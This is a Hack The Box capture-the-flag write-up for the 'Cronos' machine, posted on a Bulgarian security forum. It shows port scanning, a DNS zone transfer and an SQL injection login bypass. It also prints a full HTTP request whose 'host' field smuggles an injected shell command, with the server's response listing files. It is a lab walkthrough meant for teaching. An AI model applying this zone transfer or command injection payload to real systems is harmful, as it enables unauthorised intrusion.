Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps


h3xu

157 views

# Enumeration
The enumeration results show 3 open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So, we are dealing with an Ubuntu machine that is hosting a WebApp. Port 53 is also open and an ISC BIND service running. Let's research on it a little bit more.

[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.
 

I was having problems connecting to the web service so I added the IP to the /etc/hosts file. ![[Pasted image 20210413095138.png]]

DNS Enumeration (link)

Check out the video from hackersploit and learn about dns enumeration and zone transfers to understand the following lines.
 

$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800    IN    NS    ns1.cronos.htb.
cronos.htb.        604800    IN    A    10.10.10.13
admin.cronos.htb.    604800    IN    A    10.10.10.13
ns1.cronos.htb.        604800    IN    A    10.10.10.13
www.cronos.htb.        604800    IN    A    10.10.10.13
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)

I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too in order to access them on the browser. 
![[Pasted image 20210413101836.png]]

# Admin.cronos.htb & SQLi
![[Pasted image 20210413101925.png]]

A Quick SQLi check let's us in.
![[Pasted image 20210413102037.png]]

Two tools are running on the welcome.php page. *Ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.### Request
 

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Bls+.

I have encoded a semicolon and added the ls command for the current directory.
### Response
 

HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8

<html">
   
   <head>
      <title>Net Tool v0.1 </title>
   </head>
   
   <body>
    <h1>Net Tool v0.1</h1>
    <form method="POST" action="">
    <select name="command">
        <option value="traceroute">traceroute</option>
        <option value="ping -c 1">ping</option>
    </select>
    <input type="text" name="host" value="8.8.8.8"/>
    <input type="submit" value="Execute!"/>
    </form>
            config.php<br>
        index.php<br>
        logout.php<br>
        session.php<br>
        welcome.php<br>
              <p><a href = "logout.php">Sign Out</a></p>
   </body>
   
</html>

 

0 Comments


Recommended Comments

Няма коментари

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy